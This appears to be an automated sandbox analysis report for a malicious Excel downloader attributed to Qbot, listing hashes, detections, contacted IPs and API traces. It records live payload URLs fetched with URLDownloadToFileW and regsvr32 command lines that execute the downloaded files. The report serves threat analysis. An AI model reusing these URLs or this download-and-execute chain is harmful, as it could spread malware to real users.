Summary | ZeroBOX

rep-1051031759.xls

Downloader MSOffice File
Category Machine Started Completed
FILE s1_win7_x6403_us Nov. 12, 2021, 10:40 a.m. Nov. 12, 2021, 10:46 a.m.
Size 231.5KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 18:19:34 2015, Last Saved Time/Date: Thu Nov 11 08:08:43 2021, Security: 0
MD5 91bf161ba415880db9f4bdc5eea1500b
SHA256 371b9a5561ce861a598f19b908b8e7cc895c6f4a3cc5a7ef8dbd5cb7da2f240e
CRC32 91F78F10
ssdeep 6144:pKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgAcfFw6lxFT7kFWqOSMQ6HujLmH98DUZ:iFrlxFTMrvbiFd8Di
Yara
  • Microsoft_Office_File_Downloader_Zero - Microsoft Office File Downloader
  • Microsoft_Office_File_Zero - Microsoft Office File

IP Address Status Action
162.241.203.46 Active Moloch
164.124.101.2 Active Moloch
198.38.91.247 Active Moloch

Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6bd28000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b072000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2548
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c201000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2588
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c201000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c201000
process_handle: 0xffffffff
1 0 0
cmdline regsvr32 C:\Datop\good.good
cmdline "C:\Windows\System32\regsvr32.exe" C:\Datop\good1.good
cmdline "C:\Windows\System32\regsvr32.exe" C:\Datop\good.good
cmdline regsvr32 C:\Datop\good1.good
cmdline "C:\Windows\System32\regsvr32.exe" C:\Datop\good2.good
cmdline regsvr32 C:\Datop\good2.good
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef70000
process_handle: 0xffffffff
1 0 0
McAfee X97M/Downloader.mf
Cyren XF/Agent.AI.gen!Camelot
ClamAV Xls.Downloader.Qbot1120211-9905990-0
Kaspersky HEUR:Trojan.MSOffice.Generic
McAfee-GW-Edition X97M/Downloader.mf
Sophos Mal/DocDl-M
Tencent Trojan.MsOffice.Macro40.11014080
Ikarus Trojan-Downloader.XLM.Agent
Fortinet XF/CoinMiner.Z!tr
AVG XLS:Nastya [Trj]
Time & API Arguments Status Return Repeated

URLDownloadToFileW

url: https://centroespanolperu.net.pe/Yshqq3cSzufu/ui.html
stack_pivoted: 0
filepath_r: C:\Datop\good.good
filepath: C:\Datop\good.good
2148270085 0

URLDownloadToFileW

url: https://ggeletric.com.br/W1MYKeq0i5/ui.html
stack_pivoted: 0
filepath_r: C:\Datop\good1.good
filepath: C:\Datop\good1.good
2148270085 0

URLDownloadToFileW

url: https://ggeletric.com.br/W1MYKeq0i5/ui.html
stack_pivoted: 0
filepath_r: C:\Datop\good2.good
filepath: C:\Datop\good2.good
2148270085 0
parent_process excel.exe martian_process regsvr32 C:\Datop\good.good
parent_process excel.exe martian_process "C:\Windows\System32\regsvr32.exe" C:\Datop\good1.good
parent_process excel.exe martian_process "C:\Windows\System32\regsvr32.exe" C:\Datop\good.good
parent_process excel.exe martian_process regsvr32 C:\Datop\good1.good
parent_process excel.exe martian_process "C:\Windows\System32\regsvr32.exe" C:\Datop\good2.good
parent_process excel.exe martian_process regsvr32 C:\Datop\good2.good
file C:\Windows\System32\regsvr32.exe